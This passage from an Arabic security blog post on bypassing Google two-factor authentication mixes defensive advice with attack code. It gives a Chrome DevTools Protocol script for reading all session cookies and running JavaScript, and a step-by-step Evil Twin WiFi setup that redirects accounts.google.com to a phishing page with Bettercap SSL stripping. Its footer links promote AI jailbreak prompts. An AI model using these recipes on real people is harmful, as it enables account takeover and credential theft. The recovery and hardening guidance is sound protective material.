"security_question": 20, # سؤال الأمان (إذا مفعل)
"trusted_device": 35, # تسجيل دخول من جهاز موثوق
"recent_emails_detail": 15, # تفاصيل عن إيميلات أخيرة
"google_services_used": 10, # خدمات Google المستخدمة
}
# Google بتحتاج ~60-70 نقطة لقبول الاسترجاع
# المهاجم بيجمع المعلومات من:
# - تسريبات البيانات (last password, email)
# - OSINT (creation date, services used)
# - SIM Swap (phone SMS code)
# - هندسة اجتماعية (security questions)
# نصائح لتقوية حسابك ضد هالهجمة:
# 1. استخدم إيميل استرداد آمن (مش Yahoo أو Hotmail قديم)
# 2. استخدم رقم هاتف ثاني للاسترداد (مش رقمك الشخصي العام)
# 3. فعّل Google Advanced Protection Program
# 4. راجع إعدادات الاسترداد بشكل دوري:
# https://myaccount.google.com/signinoptions/rescuephone
الثغرة التاسعة: هجمات Pass-the-Cookie عبر البرامج الخبيثة المتقدمة
هاي ثغرة تطورت كتير بسنة 2025-2026 وصارت من أخطر التهديدات. Pass-the-Cookie مش مجرد سرقة كوكيز عادية — هاي هجمة منظمة بتستخدم برامج خبيثة متقدمة (Advanced Persistent Threat) بتقدر تتجاوز حتى حمايات Google الجديدة ضد سرقة الكوكيز.
Google بسنة 2024 أطلقت ميزة Device Bound Session Credentials (DBSC) — وهي تقنية بتربط الكوكي بالجهاز المحدد باستخدام TPM chip. يعني حتى لو المهاجم سرق الكوكي، ما بيقدر يستخدمه على جهاز ثاني لأنو الكوكي مرتبط بمفتاح تشفير على الـ TPM.
بس المهاجمين تأقلموا بسرعة! بدل ما يسرقوا الكوكي ويستخدموه على جهازهم، هسا بيشغلوا الهجمة مباشرة على جهاز الضحية عبر Remote Access Trojan (RAT). المهاجم بيسيطر على المتصفح تبع الضحية عن بعد وبيعمل كل إشي من جهاز الضحية نفسه — فالكوكي بيضل "مرتبط بالجهاز" ومافي مشكلة.
أحدث الأدوات والتقنيات:
• Browser Exploitation via CDP (Chrome DevTools Protocol): المهاجم بيتصل بـ Chrome عبر بورت debugging وبيتحكم بالمتصفح بالكامل — بيقدر يفتح tabs، يقرأ كوكيز، يسجل دخول، يرسل إيميلات — كله بدون ما الضحية يلاحظ!
• Cobalt Strike Browser Pivoting: إطار عمل C2 متقدم فيه ميزة Browser Pivoting — المهاجم بيستخدم متصفح الضحية كـ SOCKS Proxy وبيتصفح الإنترنت "من خلال" متصفح الضحية.
• Lumma Stealer 2026 Update: أحدث إصدار من Lumma Stealer بيقدر يتجاوز DBSC عبر تقنية بتسحب مفتاح الجلسة من ذاكرة Chrome مباشرة قبل ما يتم تشفيره بالـ TPM.
# Chrome DevTools Protocol - كيف المهاجمين بيستخدموه
# (بعد ما يحصلوا على وصول للجهاز)
# Chrome بيقبل اتصالات debugging على بورت 9222
# المهاجم بيشغل Chrome بـ remote debugging:
# chrome.exe --remote-debugging-port=9222 --headless
# أو بيتصل بـ Chrome الموجود عبر CDP:
import websocket
import json
def exploit_chrome_cdp(target_ip="127.0.0.1", port=9222):
"""الاتصال بـ Chrome عبر DevTools Protocol"""
# الحصول على قائمة الـ tabs المفتوحة
# GET http://target:9222/json
# الاتصال بـ tab معين عبر WebSocket
ws_url = f"ws://{target_ip}:{port}/devtools/page/TARGET_ID"
# أوامر خطيرة اللي بيقدر ينفذها:
commands = {
"get_cookies": {
"method": "Network.getAllCookies",
# بيرجع كل كوكيز المتصفح بما فيها Google session
},
"navigate": {
"method": "Page.navigate",
"params": {"url": "https://myaccount.google.com"}
# بيفتح أي صفحة بصلاحيات المستخدم
},
"execute_js": {
"method": "Runtime.evaluate",
"params": {"expression": "document.cookie"}
# بينفذ أي JavaScript بالصفحة
},
"screenshot": {
"method": "Page.captureScreenshot",
# بياخد سكرينشوت للصفحة
}
}
return commands
# كيف تحمي حالك:
# 1. تأكد إنو Chrome مش مشغّل بـ --remote-debugging-port
# 2. استخدم Antivirus محدّث
# 3. فعّل Windows Defender Application Guard
# 4. لا تحمّل برامج مشبوهة
الثغرة العاشرة: هجمات Adversary-in-the-Middle على شبكات WiFi
هاي الهجمة بتستهدف الناس اللي بتستخدم WiFi عام بدون VPN. المهاجم بيعمل شبكة WiFi وهمية بنفس اسم شبكة المقهى أو الفندق أو المطار، أو بيخترق الراوتر الحقيقي ويحوّل حركة الإنترنت عبر جهازه.
كيف بتشتغل بالتفصيل:
السيناريو 1 — Evil Twin Attack: المهاجم بيعمل Access Point وهمي اسمه مثلاً "Starbucks_Free_WiFi" وبيكون الإشارة أقوى من الشبكة الأصلية. جهاز الضحية بيتصل تلقائياً بالشبكة الأقوى. هسا كل حركة الإنترنت تبع الضحية بتمر عبر جهاز المهاجم.
السيناريو 2 — ARP Spoofing: المهاجم موصول على نفس شبكة الضحية (مقهى مثلاً) وبيعمل ARP Poisoning عشان يحول حركة الشبكة عبر جهازه. بيستخدم أدوات زي Bettercap أو Ettercap.
بمجرد ما المهاجم يكون Man-in-the-Middle، بيقدر يستخدم أداة Evilginx أو مشابه محلياً عشان يعترض طلبات تسجيل الدخول لـ Google ويسرق الكوكيز والتوكنات. وبما إنو HTTPS بيحمي من قراءة البيانات، المهاجم بيعمل SSL Stripping أو بيستخدم شهادات SSL مزيفة (بيحتاج الضحية يقبل التحذير) أو بيستخدم تقنية HSTS Bypass.
# Evil Twin + Captive Portal Attack # باستخدام hostapd و dnsmasq على Linux # الخطوة 1: إنشاء Access Point وهمي # ملف hostapd.conf: interface=wlan0 driver=nl80211 ssid=Free_Airport_WiFi hw_mode=g channel=6 # الخطوة 2: DHCP Server # ملف dnsmasq.conf: interface=wlan0 dhcp-range=192.168.1.100,192.168.1.200,12h # DNS redirect لتوجيه الضحايا لصفحة تصيّد address=/accounts.google.com/192.168.1.1 # الخطوة 3: تشغيل Bettercap لاعتراض الحركة sudo bettercap -iface wlan0 # داخل Bettercap: net.probe on set http.proxy.sslstrip true set dns.spoof.domains accounts.google.com,*.google.com dns.spoof on http.proxy on # أداة WiFi-Pumpkin3 (أسهل للاستخدام): # https://github.com/P0cL4bs/wifipumpkin3 sudo wifipumpkin3 wp3> set interface wlan0 wp3> set ssid "Free_Airport_WiFi" wp3> set proxy captiveflask wp3> start
⚠️ كيف تحمي حالك: استخدم VPN دائماً على شبكات WiFi العامة! لا تتصل بشبكات مفتوحة بدون كلمة سر. تأكد من وجود قفل HTTPS بالمتصفح. لا تقبل أي تحذيرات أمان من المتصفح. وفعّل HTTPS-Only Mode بالمتصفح.
كيف تسترجع حساب Google المسروق — دليل عملي خطوة بخطوة
هسا بعد ما حكينا عن الثغرات، خلينا نحكي عن الجانب الأهم — كيف تسترجع حسابك لو اتسرق. أنا عارف إنو الموضوع مخيف بس هاي الخطوات بتنجح بأغلب الحالات:
الخطوة 1: حاول تدخل حسابك فوراً
روح على accounts.google.com وحاول تسجل دخول. إذا المهاجم ما غيّر كلمة السر بعد — يمكن لسا بتقدر تدخل. فوراً غيّر كلمة السر وفعّل 2FA واعمل Sign Out من كل الأجهزة.
الخطوة 2: استخدم صفحة استرجاع الحساب
روح على accounts.google.com/signin/recovery وأدخل إيميلك. Google رح تعرض عليك عدة طرق للتحقق من هويتك — جاوب على كل الأسئلة بأكبر قدر ممكن من الدقة. نصائح مهمة:
• استخدم جهاز ومتصفح سبق سجلت دخول منهم — Google بتتعرف على الأجهزة الموثوقة وبتعطيك نقاط ثقة أكبر
• استخدم نفس الشبكة/الموقع الجغرافي اللي كنت تسجل دخول منه عادة
• جرب تتذكر آخر كلمة سر استخدمتها — حتى لو قديمة Google بتعتبرها دليل ملكية
• اختار "جرب طريقة ثانية" لو أول طريقة ما نفعت — Google عندها عدة خيارات
الخطوة 3: إذا ما قدرت تسترجع — تواصل مع Google مباشرة
إذا كل الطرق التلقائية فشلت، Google عندها نموذج خاص للحالات الصعبة. روح على support.google.com/accounts/contact/disabled2 وعبّي النموذج بكل التفاصيل الممكنة. أضف:
• تاريخ تقريبي لإنشاء الحساب
• آخر كلمة سر تتذكرها
• أسماء Labels أو Folders كنت مسويها بالإيميل
• جهات اتصال كنت تراسلها بكثرة
• خدمات Google الثانية المربوطة (YouTube, Google Play, etc.)
• إذا كنت بتدفع لـ Google (Google One, YouTube Premium) — هاد دليل قوي جداً
الخطوة 4: إذا عندك Google Workspace
لو حسابك تبع شركة أو مؤسسة (Google Workspace)، تواصل مع Admin بالشركة. الـ Admin بيقدر يعمل Password Reset لحسابك من Google Admin Console بلحظة.
الخطوة 5: بعد الاسترجاع — تأمين الحساب فوراً
بمجرد ما تسترجع حسابك، اعمل كل هاي الخطوات فوراً:
# خطوات تأمين الحساب بعد الاسترجاع: # 1. غيّر كلمة السر # روح على: myaccount.google.com/signinoptions/password # استخدم كلمة سر قوية وفريدة (16+ حرف) # 2. فعّل المصادقة الثنائية بمفتاح أمان # روح على: myaccount.google.com/signinoptions/two-step-verification # أضف Google Authenticator + Security Key (إذا عندك) # 3. اعمل Sign Out من كل الأجهزة # روح على: myaccount.google.com/security # "Your devices" → "Manage all devices" # اعمل Sign Out من كل جهاز # 4. ألغِ وصول التطبيقات المشبوهة # روح على: myaccount.google.com/permissions # احذف أي تطبيق مش متعرفه # 5. راجع إعدادات إعادة التوجيه بالإيميل # Gmail → Settings → Forwarding # تأكد ما في إيميل غريب بيتم تحويل رسائلك إله! # 6. افحص Filters بـ Gmail # Gmail → Settings → Filters # المهاجمين بيعملوا filters بتحذف إشعارات الأمان! # 7. ألغِ App Passwords # myaccount.google.com/apppasswords # احذف كلها واعمل جديدة لو بتحتاج # 8. راجع Recovery Email و Phone # myaccount.google.com/signinoptions/rescuephone # تأكد إنهم أرقامك وإيميلاتك — مش تبع المهاجم! # 9. فعّل Google Advanced Protection (اختياري بس مهم) # landing.google.com/advancedprotection # بيحتاج مفتاحين أمان ماديين
أفضل إعدادات حماية لحساب Google بسنة 2026 — الإعدادات المثالية
هسا بدي أعطيك أفضل إعدادات لتأمين حسابك بشكل كامل. طبّق كل هاي الخطوات واحدة واحدة وما تترك ولا وحدة:
1. كلمة سر قوية وفريدة: استخدم Password Manager زي Bitwarden (مجاني ومفتوح المصدر) أو 1Password. كلمة السر لازم تكون 16 حرف على الأقل — أحرف كبيرة وصغيرة وأرقام ورموز. وما تستخدم نفس كلمة السر لأي حساب ثاني أبداً.
2. المصادقة الثنائية بأقوى طريقة: الترتيب من الأقوى للأضعف:
🥇 مفتاح أمان مادي (FIDO2) — YubiKey 5 NFC أو Google Titan Key
🥈 Passkeys — بصمة أو Face ID
🥉 Google Authenticator / Authy — أكواد TOTP
⚠️ Google Prompt — مقبول بس مش مثالي
❌ SMS — لا تستخدمها أبداً
3. Google Advanced Protection Program: هاد أعلى مستوى حماية من Google. بيمنع تسجيل الدخول بدون مفتاح أمان مادي. بيمنع تطبيقات الطرف الثالث من الوصول لحسابك. بيضيف فحص إضافي لكل الملفات المحمّلة. مجاني بس بيحتاج مفتاحين أمان ماديين. سجّل من: landing.google.com/advancedprotection
4. إعدادات الاسترداد: حط إيميل استرداد آمن (مش إيميل قديم مهمل). حط رقم هاتف للاسترداد (ويفضّل رقم ثاني مش رقمك الشخصي العام). اعمل Generate لأكواد احتياطية جديدة واحفظها بمكان آمن أوفلاين.
5. فحوصات دورية: كل شهر روح على myaccount.google.com/security-checkup واعمل فحص أمان شامل. افحص الأجهزة المتصلة، التطبيقات المرتبطة، وأحداث الأمان الأخيرة.
وإذا بدك تعرف أكتر عن أدوات الحماية المتقدمة، شوف مقالنا عن أفضل 10 أدوات اختبار اختراق على GitHub عشان تفهم كيف المهاجمين بيشتغلوا وتحمي حالك.
أدوات فحص أمان حسابك — اكتشف لو حسابك مخترق
هسا بدي أعطيك أدوات تقدر تستخدمها عشان تفحص إذا حسابك آمن ولا لا:
1. Google Security Checkup
أول وأهم إشي — myaccount.google.com/security-checkup. Google بتعمللك فحص شامل وبتعرضلك: أجهزة مسجّل دخول منها، تطبيقات مرتبطة بحسابك، أحداث أمان أخيرة، إعدادات المصادقة الثنائية، وإعدادات الاسترداد.
2. Have I Been Pwned
haveibeenpwned.com — موقع بيفحص إذا إيميلك ظهر بأي تسريب بيانات. أدخل إيميلك وبيعرضلك كل التسريبات اللي ظهرت فيها بياناتك. إذا ظهر — غيّر كلمة سرك فوراً!
3. Google Password Checkup
passwords.google.com — إذا بتحفظ كلمات سر بـ Chrome، Google بتفحصهم وبتقولك إذا في كلمات سر مسربة أو ضعيفة أو مكررة.
4. فحص نشاط الحساب
روح على myaccount.google.com/notifications وشوف آخر الأحداث الأمنية. وكمان روح على myactivity.google.com وشوف إذا في نشاط غريب مش تبعك — بحث عن مواضيع غريبة، زيارات لمواقع ما زرتها، إلخ.
# سكربت Python لفحص إذا إيميلك بتسريبات بيانات
# باستخدام Have I Been Pwned API v3
import requests
import hashlib
import sys
def check_email_breach(email):
"""فحص إذا الإيميل ظهر بتسريبات"""
url = f"https://haveibeenpwned.com/api/v3/breachedaccount/{email}"
headers = {
"hibp-api-key": "YOUR_API_KEY", # بتحتاج API key مجاني
"user-agent": "SecurityCheck-Script"
}
resp = requests.get(url, headers=headers)
if resp.status_code == 200:
breaches = resp.json()
print(f"[!] ALERT: {email} found in {len(breaches)} breaches!")
for b in breaches:
print(f" - {b['Name']} ({b['BreachDate']})")
print(f" Data: {', '.join(b['DataClasses'])}")
return breaches
elif resp.status_code == 404:
print(f"[+] {email} - No breaches found!")
return []
else:
print(f"[-] Error: HTTP {resp.status_code}")
return None
def check_password_leaked(password):
"""فحص إذا كلمة السر مسربة (k-Anonymity - آمن!)"""
# بنستخدم Pwned Passwords API بطريقة k-Anonymity
# بنبعث أول 5 حروف من SHA1 hash بس!
sha1 = hashlib.sha1(password.encode()).hexdigest().upper()
prefix = sha1[:5]
suffix = sha1[5:]
url = f"https://api.pwnedpasswords.com/range/{prefix}"
resp = requests.get(url)
for line in resp.text.splitlines():
hash_suffix, count = line.split(":")
if hash_suffix == suffix:
print(f"[!] PASSWORD LEAKED {count} times!")
print(f" CHANGE IT IMMEDIATELY!")
return int(count)
print("[+] Password not found in known breaches.")
return 0
# الاستخدام:
# check_email_breach("your-email@gmail.com")
# check_password_leaked("your-password-here")
مقارنة بين طرق 2FA — أيها الأقوى ضد كل نوع هجوم؟
| نوع الهجمة | SMS | TOTP App | Google Prompt | Passkeys | FIDO2 Key |
|---|---|---|---|---|---|
| Real-Time Phishing | ❌ ضعيف | ❌ ضعيف | ⚠️ متوسط | ✅ قوي | ✅ محصّن |
| SIM Swapping | ❌ ضعيف | ✅ محصّن | ✅ محصّن | ✅ محصّن | ✅ محصّن |
| SS7 Interception | ❌ ضعيف | ✅ محصّن | ✅ محصّن | ✅ محصّن | ✅ محصّن |
| Prompt Bombing | — | ✅ محصّن | ❌ ضعيف | ✅ محصّن | ✅ محصّن |
| Session Cookie Theft | ❌ ضعيف | ❌ ضعيف | ❌ ضعيف | ⚠️ متوسط | ⚠️ متوسط |
| OAuth Phishing | ❌ ضعيف | ❌ ضعيف | ❌ ضعيف | ❌ ضعيف | ❌ ضعيف |
| Malware/RAT | ❌ ضعيف | ❌ ضعيف | ❌ ضعيف | ⚠️ متوسط | ⚠️ متوسط |
| WiFi MITM | ❌ ضعيف | ❌ ضعيف | ⚠️ متوسط | ✅ قوي | ✅ محصّن |
من الجدول واضح إنو مفاتيح الأمان المادية (FIDO2) هي الأقوى — بتصمد ضد أغلب الهجمات. بس حتى هي مش 100% محصنة ضد سرقة الكوكيز والبرامج الخبيثة. الحماية الكاملة بتحتاج طبقات متعددة مش حل واحد.
أسئلة شائعة
سؤال: هل المصادقة الثنائية كافية لحماية حسابي؟
لا، المصادقة الثنائية بتزيد الأمان بشكل كبير بس مش حماية مطلقة. زي ما شفنا بالمقال، في طرق متعددة لتخطيها. لازم تستخدم 2FA + كلمة سر قوية + وعي أمني + عدم تحميل برامج مشبوهة. الحماية طبقات مش حل واحد.
سؤال: شو أفضل نوع 2FA أستخدمه لحساب Google؟
أفضل خيار هو مفتاح أمان مادي FIDO2 (زي YubiKey 5 NFC — سعره حوالي $25-50). ثاني أفضل خيار هو Passkeys على جهاز محمي ببصمة أو Face ID. ثالث خيار Google Authenticator أو Authy. لا تستخدم SMS أبداً إذا في خيار ثاني.
سؤال: لو حسابي اتسرق وما قدرت أسترجعه بالطرق العادية شو أعمل؟
أول إشي جرب accounts.google.com/signin/recovery من جهاز ومتصفح كنت تستخدمه سابقاً. إذا ما نفع، جرب بعد 24-48 ساعة (أحياناً Google بتمنع المحاولات المتكررة). إذا لسا ما نفع، تواصل مع Google عبر support.google.com/accounts/contact/disabled2. إذا كنت بتدفع لخدمة Google (YouTube Premium, Google One) تواصل مع دعم العملاء المدفوع — عندهم أولوية بالرد.
سؤال: كيف أعرف إذا حسابي مخترق حالياً؟
في عدة علامات: إيميلات بتتقرأ بدون ما تفتحها أنت، رسائل بتتبعت من حسابك ما أرسلتها، إشعارات تسجيل دخول من أماكن ما كنت فيها، تطبيقات مربوطة بحسابك ما عملتلها authorize. روح على myaccount.google.com/security وافحص "Recent security activity" و "Your devices". وافحص إعدادات forwarding بالـ Gmail.
سؤال: هل Passkeys أفضل من كلمات السر التقليدية؟
نعم بمراحل! Passkeys بتعتمد على تشفير Public/Private Key — المفتاح الخاص ما بيطلع من جهازك أبداً فما في إشي ينسرق. ما في إشي تتذكره فما في خطر نسيان. محصّنة ضد التصيّد لأنو بتتحقق من الـ domain تلقائياً. وأسرع بكتير — بصمة بدل كتابة كلمة سر. Google، Apple، Microsoft كلهم بينصحوا بالتحويل لـ Passkeys.
سؤال: إذا حدا عمل SIM Swap على رقمي كيف بعرف؟
أول علامة: تلفونك فجأة فقد الشبكة وما عاد يلاقي إشارة. إذا صار هيك وما كان في مشكلة تقنية بالمنطقة — تواصل مع شركة الاتصالات فوراً من تلفون ثاني واسألهم إذا تم نقل رقمك. كمان ممكن تلاحظ إشعارات من Google عن تسجيل دخول من جهاز جديد — لو ظهرت وأنت ما سجلت دخول، هاد مؤشر خطير.
سؤال: هل Google Advanced Protection Program مجاني؟
نعم البرنامج نفسه مجاني 100%. بس بتحتاج تشتري مفتاحين أمان ماديين (Security Keys) — سعرهم حوالي $25-50 لكل واحد. يعني الاستثمار الوحيد هو سعر المفاتيح. البرنامج بيعطيك أعلى مستوى حماية متاح من Google — بيمنع تسجيل الدخول بدون المفتاح المادي، بيمنع معظم تطبيقات الطرف الثالث، وبيضيف فحص إضافي للملفات المحملة. أنا بنصح فيه لكل شخص حسابه مهم.
الخلاصة والتوصيات النهائية
بالنهاية، لو بدنا نحكيها بصراحة... المصادقة الثنائية مش حماية سحرية زي ما كتير ناس فاكرة. في طرق حقيقية وشغالة لتخطيها — من التصيّد بالوقت الحقيقي لسرقة الكوكيز لهجمات SIM Swap وغيرها. بس هاد مش معناه إنك ما تستخدمها! المصادقة الثنائية لسا بتصد 99% من الهجمات العادية — والطرق اللي حكينا عنها بتحتاج جهد ومهارة وتكلفة من المهاجم.
توصياتي النهائية:
• استخدم مفاتيح أمان مادية (FIDO2) لو حسابك مهم — هاي أقوى حماية متاحة
• لا تستخدم SMS أبداً كطريقة 2FA — حوّل على TOTP أو Passkeys
• لا تحمّل برامج مقرصنة — هاي أكبر مصدر لبرامج سرقة الكوكيز
• استخدم VPN على شبكات WiFi العامة
• افحص حسابك دورياً من myaccount.google.com/security-checkup
• فعّل Google Advanced Protection إذا حسابك مهم جداً
• راجع التطبيقات المرتبطة بحسابك وإعدادات إعادة التوجيه بالإيميل
والأهم من كل هاد — الوعي الأمني. لا تضغط على روابط مشبوهة، لا تعطي أكوادك لأي حدا مهما كان، ولا تثق بأي شخص بيطلب منك معلومات حساسة عبر الإنترنت أو الهاتف حتى لو ادّعى إنو من Google.
شاركونا بالتعليقات تجاربكم مع حماية حساباتكم وإذا سبق تعرضتوا لأي هجمة من هاللي حكينا عنها. وإذا بدكم نعمل مقال عن أي موضوع ثاني — حكولنا على قناتنا على Telegram. السلام عليكم!
🔥 مواضيع ذات صلة من Shadow Hacker:
- السر وراء اكتشاف الثغرات واستغلالها bug bounty 2026
- أقوى تخطي برومبت جديد لذكاء الأصطناعي جيميناي ChatGPT
- كيف تتخطى قيود Gemini و Grok وتحوّلها لأدوات خارقة Hacker
- Instagram Mass Report أداة لإبلاغ عن حسابات انستقرام 2026
- كيف تحصل على RDP مجاني من Google عبر Firebase studio
- فك حظر حساب واتساب | كود لفك حظر الواتساب نهائياً 2026
تخطي المصادقة الثنائية Google، ثغرات 2FA Gmail، استرجاع حساب Google مسروق 2026، bypass Google 2FA، هجمات SIM Swapping، Real-Time Phishing Evilginx، سرقة Session Cookies Chrome، OAuth Consent Phishing، Google Prompt Bombing، MFA Fatigue Attack، SS7 SMS Interception، Google Advanced Protection، حماية حساب Gmail 2026، Passkeys vs Security Keys، FIDO2 Google Authentication، استرجاع حساب Gmail بدون رقم هاتف، أفضل طريقة حماية حساب Google، أمن حسابات Google 2026
Shadow Hacker
مؤسس ومحرر المدونة | خبير أمن معلومات وتقنية
متخصص في الأمن السيبراني واختبار الاختراق وتحليل الثغرات. بشارك معكم كل جديد في عالم التقنية والأمن المعلوماتي بأسلوب عملي ومبسط.
